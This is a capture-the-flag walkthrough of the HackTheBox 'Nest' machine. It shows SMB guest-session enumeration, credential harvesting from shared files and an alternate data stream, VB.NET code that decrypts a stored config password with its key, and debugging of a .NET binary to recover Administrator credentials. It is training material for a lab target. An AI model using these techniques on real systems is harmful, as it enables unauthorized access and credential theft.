Nest Writeup (HackTheBox)
Enumeration
Starting off with an nmap scan, we have to ports to work with: SMB and some other services running on port 4386.
root@kali:~/Documents/HackTheBox/Nest# nmap -Pn -sS -p1-10000 -T4 -sV 10.10.10.178 -v | tee nmap.txt
...
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
...
Since I knew SMB would be running on 445, I decided to quickly check out the service on 4386.
root@kali:~/Documents/HackTheBox/Nest# nc -nv 10.10.10.178 4386
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.178:4386.
HQK Reporting Service V1.2
>HELP
A quick search for HQK Reporting Service 1.2 didn’t yield any information. Furthermore, typing anything would just cause the connection to hang and I wouldn’t receive any response. Before moving on however, I decided to try and connect using telnet. This time I was receiving responses to my input, so I poked around a bit.
root@kali:~/Documents/HackTheBox/Nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>help setdir
SETDIR <Directory>
Selects a new directory where query files can be run from. Use the LIST command to view available directory names (marked with [DIR]) that can be used with this command. The special characters ".." can be used to go back upto the previous directory.
Examples:
SETDIR MY QUERIES Changes to the directory named "MY QUERIES"
SETDIR .. Changes to the parent directory of the current directory
>help list
LIST
Lists the available queries in the current directory, along with an ID number for each query. This number can be used with the RUNQUERY or SHOWQUERY commands.
To change the current directory use the SETDIR command
>help debug
DEBUG <Password>
Enables debug mode, which allows the use of additional commands to use for troubleshooting network and configuration issues. Requires a password which will be set by your system administrator when the service was installed
Examples:
DEBUG MyPassw0rd Attempts to enable debug mode by using the
password "MyPassw0rd"
So it looks like we can use this tool to at least move around various directories (using SETDIR) and list the contents using LIST. But before going down this path, I decided to give unauthenticated SMB access a go.
root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u ''
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u 'Guest'
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ NO ACCESS
Users READ ONLY
While a NULL session did not work, a Guest session did allow me to list available shares. However (and this part still confuses me), when I went to login with smbclient using the Guest username and no password, I couldn’t log in (despite having READ ONLY access). However, when I just hit Enter when asked for a password, I could log in fine. On a similar note, supplying a non-existent username with no password woked for both smbmap and smbclient.
# Guest with no password
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U Guest -N
session setup failed: NT_STATUS_LOGON_FAILURE
# Guest with blank string password - same as no password?
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U Guest ''
session setup failed: NT_STATUS_LOGON_FAILURE
# Guest with <ENTER> as password works fine
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U Guest
Enter WORKGROUP\Guest's password:
Try "help" to get a list of possible commands.
smb: \>
# smbmap with nonexistent user works fine (same as Guest)
root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u 'fake'
[+] Guest session IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ NO ACCESS
Users READ ONLY
# smbclient with nonexistent user and no password works fine - why?
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U fake -N
Try "help" to get a list of possible commands.
smb: \>
My theory here is that smbclient was actually trying to login as the built-in Guest user, which might be disabled, whereas smbmap was just logging in as a random user? Perhaps something to do with how Anonymous, Guest and Everyone are three different entities in Windows when sharing files? I’d be very interested to know the reasoning behind this, but from now on I’ll just include the following 3 items on my SMB enumeration checklist:
1. NULL sessions (no username, no password)
2. Guest sessions (Guest username / no password and Guest username / random password)
3. "Random" sessions (Random username / no password and random username / random password)
Once finally able to login, I started with the Users share. No access to anything, but at least a ist of users who have logged in to the machine.
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'fake' -N
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
. D 0 Sat Jan 25 18:04:21 2020
.. D 0 Sat Jan 25 18:04:21 2020
Administrator D 0 Fri Aug 9 11:08:23 2019
C.Smith D 0 Sun Jan 26 02:21:44 2020
L.Frost D 0 Thu Aug 8 13:03:01 2019
R.Thompson D 0 Thu Aug 8 13:02:50 2019
TempUser D 0 Wed Aug 7 18:55:56 2019
\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*
\C.Smith
NT_STATUS_ACCESS_DENIED listing \C.Smith\*
\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*
\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*
\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*
Moving on to the Data share, we have access to a couple of items.
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Data -U 'fake' -N
Try "help" to get a list of possible commands.
smb: \> recurse
smb: \> dir
IT D 0 Wed Aug 7 18:58:07 2019
Production D 0 Mon Aug 5 17:53:38 2019
Reports D 0 Mon Aug 5 17:53:44 2019
Shared D 0 Wed Aug 7 15:07:51 2019
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*
\Shared
Maintenance D 0 Wed Aug 7 15:07:32 2019
Templates D 0 Wed Aug 7 15:08:07 2019
\Shared\Maintenance
Maintenance Alerts.txt A 48 Mon Aug 5 19:01:44 2019
\Shared\Templates
HR D 0 Wed Aug 7 15:08:01 2019
Marketing D 0 Wed Aug 7 15:08:06 2019
\Shared\Templates\HR
Welcome Email.txt A 425 Wed Aug 7 18:55:36 2019
smb: \> get "Shared\Maintenance\Maintenance Alerts.txt" "Maintenance Alerts.txt"
...
smb: \> get "Shared\Templates\HR\Welcome Email.txt" "Welcome Email.txt"
...
And let’s see what’s inside! While Maintenance Alerts.txt wasn’t useful, the other file was indeed very helpful.
root@kali:~/Documents/HackTheBox/Nest# cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
HR
Credentials for a user we know exists on the host! I proceeded to re-enumerate with my new login of TempUser / welcome2019
With this login, not only do we still have access to the previous shares, but now also the new Secure$ share.
root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u 'TempUser' -p 'welcome2019'
[+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
Secure$ READ ONLY
Users READ ONLY
First, let’s see what’s in the Users share in our TempUser directory.
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'TempUser' 'welcome2019'
Try "help" to get a list of possible commands.
smb: \> dir TempUser/
. D 0 Wed Aug 7 18:55:56 2019
.. D 0 Wed Aug 7 18:55:56 2019
New Text Document.txt A 0 Wed Aug 7 18:55:56 2019
Just an empty text file. Now let’s try the Data share again.
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Data -U TempUser 'welcome2019'
smb: \> recurse
smb: \> dir
IT D 0 Wed Aug 7 18:58:07 2019
Production D 0 Mon Aug 5 17:53:38 2019
Reports D 0 Mon Aug 5 17:53:44 2019
Shared D 0 Wed Aug 7 15:07:51 2019
\IT
Archive D 0 Mon Aug 5 18:33:58 2019
Configs D 0 Wed Aug 7 18:59:34 2019
Installs D 0 Wed Aug 7 18:08:30 2019
Reports D 0 Sat Jan 25 19:09:13 2020
Tools D 0 Mon Aug 5 18:33:43 2019
\Shared
Maintenance D 0 Wed Aug 7 15:07:32 2019
Templates D 0 Wed Aug 7 15:08:07 2019
\IT\Configs
Adobe D 0 Wed Aug 7 15:20:09 2019
Atlas D 0 Tue Aug 6 07:16:18 2019
DLink D 0 Tue Aug 6 09:25:27 2019
Microsoft D 0 Wed Aug 7 15:23:26 2019
NotepadPlusPlus D 0 Wed Aug 7 15:31:37 2019
RU Scanner D 0 Wed Aug 7 16:01:13 2019
Server Manager D 0 Tue Aug 6 09:25:19 2019
\Shared\Maintenance
Maintenance Alerts.txt A 48 Mon Aug 5 19:01:44 2019
\Shared\Templates
HR D 0 Wed Aug 7 15:08:01 2019
Marketing D 0 Wed Aug 7 15:08:06 2019
\IT\Configs\Adobe
editing.xml AH 246 Sat Aug 3 08:58:42 2019
Options.txt A 0 Mon Oct 10 17:11:14 2011
projects.xml A 258 Tue Jan 8 11:30:52 2013
settings.xml A 1274 Wed Aug 7 15:19:12 2019
\IT\Configs\Atlas
Temp.XML A 1369 Wed Jun 11 03:38:22 2003
\IT\Configs\Microsoft
Options.xml A 4598 Sat Mar 3 14:24:24 2012
\IT\Configs\NotepadPlusPlus
config.xml A 6451 Wed Aug 7 19:01:25 2019
shortcuts.xml A 2108 Wed Aug 7 15:30:27 2019
\IT\Configs\RU Scanner
RU_config.xml A 270 Thu Aug 8 15:49:37 2019
\Shared\Templates\HR
Welcome Email.txt A 425 Wed Aug 7 18:55:36 2019
Rather than get all these files manually, I opted to use this new tool I had recently learned about called smbget. What I like about this tool is that it preserves the directory structure when recursively fetching files.
root@kali:~/Documents/HackTheBox/Nest# smbget -U 'TempUser'%'welcome2019' -R smb://10.10.10.178/Data/
I then started to go through the various TXT and XML files I had just downloaded. These were the two that stood out to me as being more useful than the others. First, a Notepad++ configuration file that listed paths to other files that were once open. In particular, note that the path Secure$\IT\Carl was valid when this file was created.
root@kali:~/Documents/HackTheBox/Nest# cat IT/Configs/NotepadPlusPlus/config.xml
<?xml version="1.0" encoding="Windows-1252" ?>
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
...
Secondly, a configuration file for something called RU Scanner that contained some kind of password for user C.Smith (potentially linked to the Windows user C.Smith).
root@kali:~/Documents/HackTheBox/Nest# cat IT/Configs/RU\ Scanner/RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
While this looks like a base64 encoded password, I tried out the password as-is, just in case. Unsurprisingly however, it failed.
root@kali:~/Documents/HackTheBox/Nest# smbmap -H 10.10.10.178 -u 'c.smith' -p 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE='
[!] Authentication error on 10.10.10.178
Decoding the base64 resulted in a bunch of garbage characters, indicating to me that the underlying text was encrypted in some way.
root@kali:~/Documents/HackTheBox/Nest# echo 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=' | base64 -d
}13��=X�J�BA�X*�Wc�f���?βc
Remember that Notepad++ configuration file that told us the path Secure$\IT\Carl exists? While I didn’t think I could do anything with this, rather than assume I decided to actually try and specifically list the IT\Carl directory. To my surprise, it worked!
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Secure$ -U 'TempUser' 'welcome2019'
Try "help" to get a list of possible commands.
smb: \> dir
Finance D 0 Wed Aug 7 15:40:13 2019
HR D 0 Wed Aug 7 19:08:11 2019
IT D 0 Thu Aug 8 06:59:25 2019
10485247 blocks of size 4096. 6543116 blocks available
smb: \> dir IT/
NT_STATUS_ACCESS_DENIED listing \IT\
smb: \> dir IT/Carl/
Docs D 0 Wed Aug 7 15:44:00 2019
Reports D 0 Tue Aug 6 09:45:40 2019
VB Projects D 0 Tue Aug 6 10:41:55 2019
Once again, I used smbget to download the files from this folder and mimic the directory structure. Taking a closer look at what I had collected, I found what looked like source code for the RU Scanner application - the same application that had the config file with the encrypted password. So, it’s possible that the source code could tell me how the password was encrypted, allowing me to reverse the process and get a plaintext password.
root@kali:~/Documents/HackTheBox/Nest/Carl# smbget -U TempUser -R -D smb://10.10.10.178/Secure$/IT/Carl
...
root@kali:~/Documents/HackTheBox/Nest/Carl/VB Projects# ls -alR
...
./WIP/RU/RUScanner:
total 52
drwxr-xr-x 5 root root 4096 May 19 21:27 .
drwxr-xr-x 3 root root 4096 May 19 21:27 ..
drwxr-xr-x 4 root root 4096 May 19 21:27 bin
-rwxr-xr-x 1 root root 772 May 19 21:27 ConfigFile.vb
-rwxr-xr-x 1 root root 279 May 19 21:27 Module1.vb
drwxr-xr-x 2 root root 4096 May 19 21:27 'My Project'
drwxr-xr-x 3 root root 4096 May 19 21:27 obj
-rwxr-xr-x 1 root root 4828 May 19 21:27 'RU Scanner.vbproj'
-rwxr-xr-x 1 root root 143 May 19 21:27 'RU Scanner.vbproj.user'
-rwxr-xr-x 1 root root 133 May 19 21:27 SsoIntegration.vb
-rwxr-xr-x 1 root root 4888 May 19 21:27 Utils.vb
...
After looking through Module1.vb and Utils.vb, I was able to find the password decryption code and put together my own VB.NET code snippet to decrypt the base64 string I had. I used .NET Fiddle to run this code online.
Imports System
Imports System.Text
Imports System.Security.Cryptography
Public Module Module1
Public Function Decrypt(ByVal cipherText As String, _
ByVal passPhrase As String, _
ByVal saltValue As String, _
ByVal passwordIterations As Integer, _
ByVal initVector As String, _
ByVal keySize As Integer) _
As String
Dim initVectorBytes As Byte()
initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte()
saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _
saltValueBytes, _
passwordIterations)
Dim keyBytes As Byte()
keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider
symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform
decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream
memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream
cryptoStream = New CryptoStream(memoryStream, _
decryptor, _
CryptoStreamMode.Read)
Dim plainTextBytes As Byte()
ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer
decryptedByteCount = cryptoStream.Read(plainTextBytes, _
0, _
plainTextBytes.Length)
memoryStream.Close()
cryptoStream.Close()
Dim plainText As String
plainText = Encoding.ASCII.GetString(plainTextBytes, _
0, _
decryptedByteCount)
Return plainText
End Function
Public Sub Main()
Console.Writeline(Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256))
End Sub
End Module
This gave me the following output:xRxRxPANCAK3SxRxRx, which I immediately tried with the C.Smith user against SMB.
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'C.Smith' 'xRxRxPANCAK3SxRxRx'
Try "help" to get a list of possible commands.
smb: \> cd C.Smith\
smb: \C.Smith\> recurse
smb: \C.Smith\> dir
HQK Reporting D 0 Thu Aug 8 19:06:17 2019
user.txt A 32 Thu Aug 8 19:05:24 2019
\C.Smith\HQK Reporting
AD Integration Module D 0 Fri Aug 9 08:18:42 2019
Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019
HQK_Config_Backup.xml A 249 Thu Aug 8 19:09:05 2019
\C.Smith\HQK Reporting\AD Integration Module
HqkLdap.exe A 17408 Wed Aug 7 19:41:16 2019
I grabbed everything once again using smbget, submitted the user flag, and then went on to check if our new user had access to other useful folders we didn’t have before. Not finding anything good, I proceeded with these newly collected files.
Based on the HQK_Config_Backup.xml, this folder had something to do with the service listening on port 4386.
root@kali:~/Documents/HackTheBox/Nest/CSmith_User/HQK Reporting# cat HQK_Config_Backup.xml
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>4386</Port>
<QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>
Remember there was also a DEBUG option which took a password - which is probably what the Debug Mode Password.txt file contains. To my surprise though, the file was completely empty. After puzzling around with what I could possibly do with a 0 byte file, and visiting other shares to make sure I didn’t miss anything, I remembered something I had read about Alternate Data Streams.
Alternate Data Streams?
Basically, the NTFS file system is able to store multiple streams of data for a given file. The main stream that everyone is familiar with is the unnamed stream, which simply contains the contents of the file. However, any given file could have any number of named streams, all of which can contain different information. While there are many ways to access these alternate streams (e.g. PowerShell), I had to do so using only SMB access. The smbclient tool is able to display all available streams using the allinfo command, as seen below. The stream contents can then be retrieved using the get command by appending :STREAM_NAME to the end of the file name.
Indeed, the file did have an alternate Password stream, which I was able to retrieve.
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'C.Smith' 'xRxRxPANCAK3SxRxRx'
Try "help" to get a list of possible commands.
smb: \> cd "C.Smith\HQK Reporting\"
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Thu Aug 8 07:06:12 PM 2019 EDT
access_time: Thu Aug 8 07:06:12 PM 2019 EDT
write_time: Thu Aug 8 07:08:17 PM 2019 EDT
change_time: Thu Aug 8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password" "dbg_alt_stream.txt"
root@kali:~/Documents/HackTheBox/Nest/CSmith_User/HQK Reporting$ cat dbg_alt_stream.txt
WBQ201953D8w
Armed with what looks like our debug mode password, let’s go try it out.
root@kali:~/Documents/HackTheBox/Nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
>service
--- HQK REPORTING SERVER INFO ---
Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES
>session
--- Session Information ---
Session ID: 828e991b-3c83-496c-a882-dacf8b9f431f
Debug: True
Started At: 5/20/2020 3:48:50 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.14.252:53992
Current Query Directory: C:\Program Files\HQK\ALL QUERIES
>help showquery
SHOWQUERY <Query_ID>
Shows the contents of the specified database query. Use the LIST command to view available queries, making note of the ID number next to the query you want to view, then use the SHOWQUERY command with that ID number.
Examples:
SHOWQUERY 5 Shows the query with ID number 5
The DEBUG command has unlocked two diagnostic style commands for us, but more importantly the SHOWQUERY command. In combination with SETDIR and LIST, we should be able to show the contents of any file we can access.
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Using the built-in commands, we now have what appears to be another password hash for the Administrator user account (looking very similar to the RUScanner hash above). Just to be sure, I tried logging in with this string, but it did not work (as expected).
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'Administrator' 'yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4='
session setup failed: NT_STATUS_LOGON_FAILURE
Once again, base64 decoding yielded what looked like an encrypted string.
root@kali:~/Documents/HackTheBox/Nest# echo "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=" | base64 -d�!*�K�@�^.��A�j���)׆�H�U�
Based on the directory that this information was found in (C:\Program Files\HQK\LDAP), I thought maybe this had something to do with the HqkLdap.exe file we found in C.Smith’s user folder. Using the file command, I saw that said binary was a .NET executable.
root@kali:~/Documents/HackTheBox/Nest/CSmith_User/HQK Reporting/AD Integration Module# file HqkLdap.exe
HqkLdap.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Thinking that this binary may give a clue as to how the password is encrypted, I downloaded dnSpy on my Windows VM and took a closer look.
It looks like this program does the following:
1. Checks that there is 1 command line argument.
2. Checks if HqkDbImport.exe exists.
3. Reads the file specified on the command line argument (presumably the **ldap.conf** file we found).
4. Creates an object with the decrypted password.
Knowing this, I could simply create my own ldap.conf file, pass it an as an argument, and set a breakpoint that would pause the program’s execution and allow me to view the decrypted password in the object’s memory. I also needed to create a fake HqkDbImport.exe file, just so that the existence check would pass.
With all this done, my working directory looked like this:
I then set a breakpoint in the code (indicated by the red dot) just after the password decryption occurred.
Finally, I ran the program in debug mode, passing in my ldap.conf file as an argument.
After hitting OK, the program ran and then paused, showing me all the local variables. Scrolling around a bit, I found the password.
With the new credentials of Administrator / XtH4nkS4Pl4y1nGX I proceeded to log in to the Users share. Here, I was greeted with a shortcut to the flag, rather than the actual flag itself. I downloaded the file and used strings to see where the shortcut was pointing to.
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\Users -U 'Administrator' 'XtH4nkS4Pl4y1nGX'
Try "help" to get a list of possible commands.
smb: \> dir Administrator\
. D 0 Fri Aug 9 11:08:23 2019
.. D 0 Fri Aug 9 11:08:23 2019
flag.txt - Shortcut.lnk A 2384 Fri Aug 9 11:10:15 2019
smb: \> get "Administrator\flag.txt - Shortcut.lnk"
root@kali:~/Documents/HackTheBox/Nest# strings flag.txt\ -\ Shortcut.lnk
...
\\Htb-nest\c$\Users\Administrator\Desktop\flag.txt
...
As I suspected, I had to connect to the C$ share and browse the file system from there.
root@kali:~/Documents/HackTheBox/Nest# smbclient \\\\10.10.10.178\\C$ -U 'Administrator' 'XtH4nkS4Pl4y1nGX'
Try "help" to get a list of possible commands.
smb: \> dir Users\Administrator\Desktop\
desktop.ini AHS 282 Sat Jan 25 17:02:44 2020
root.txt A 32 Mon Aug 5 18:27:26 2019
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> dir
desktop.ini AHS 282 Sat Jan 25 17:02:44 2020
root.txt A 32 Mon Aug 5 18:27:26 2019
smb: \Users\Administrator\Desktop\> get root.txt
And with that, the root flag is captured! Best part? There’s no cleanup on the remote host for us to do.